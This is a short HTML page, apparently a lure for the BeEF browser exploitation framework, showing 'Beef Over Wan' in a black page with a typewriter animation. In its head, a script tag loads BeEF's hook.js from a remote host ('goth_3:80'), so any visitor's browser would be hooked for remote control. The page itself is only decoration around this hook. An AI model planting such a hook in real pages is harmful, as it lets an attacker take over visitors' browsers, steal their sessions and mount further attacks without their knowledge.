<!DOCTYPE html>
<html>

   <head>
       <meta charset="UTF-8">
       <title>Beef</title>
       <script src="http://goth_3:80/hook.js"></script>

       <style>
       
       body{
           background-color: black;
           text-align: center;
       }

       .beef {
         color:chartreuse;
        margin-top: 100px;
        font-size: 40px;
        text-shadow: red 1px 1px,red 2px 2px,red 3px 3px;
        
       }

        p::after {
    content: '|';
    opacity: 1;
    margin-left: 5px;
    display: inline-block;
    animation: blink .7s infinite;
  }

@keyframes opacity {
  0%, 100% {
    opacity: 0;
  }
  50% {
    opacity: 1;
    color: yellow;
  }
}

@keyframes blink {
    0%, 100% {
      opacity: 1;
    }
    50% {
      opacity: 0;
    }
  }

       </style>
   </head>

   <body>


    <div class="beef">
        <img src="https://cdn.discordapp.com/attachments/581170733565214731/710380555656757289/beef.png">
        <p>Beef Over Wan</p>

        <script>
                function typeWriter(elemento) {
                  const textoArray = elemento.innerHTML.split('');
                  elemento.innerHTML = '';
                  textoArray.forEach((letra, i) => {
                    setTimeout(() => elemento.innerHTML += letra, 75 * i);
                  });
                }
                const titulo = document.querySelector('p');
                typeWriter(titulo);
              </script>

    </div>



   </body>

</html>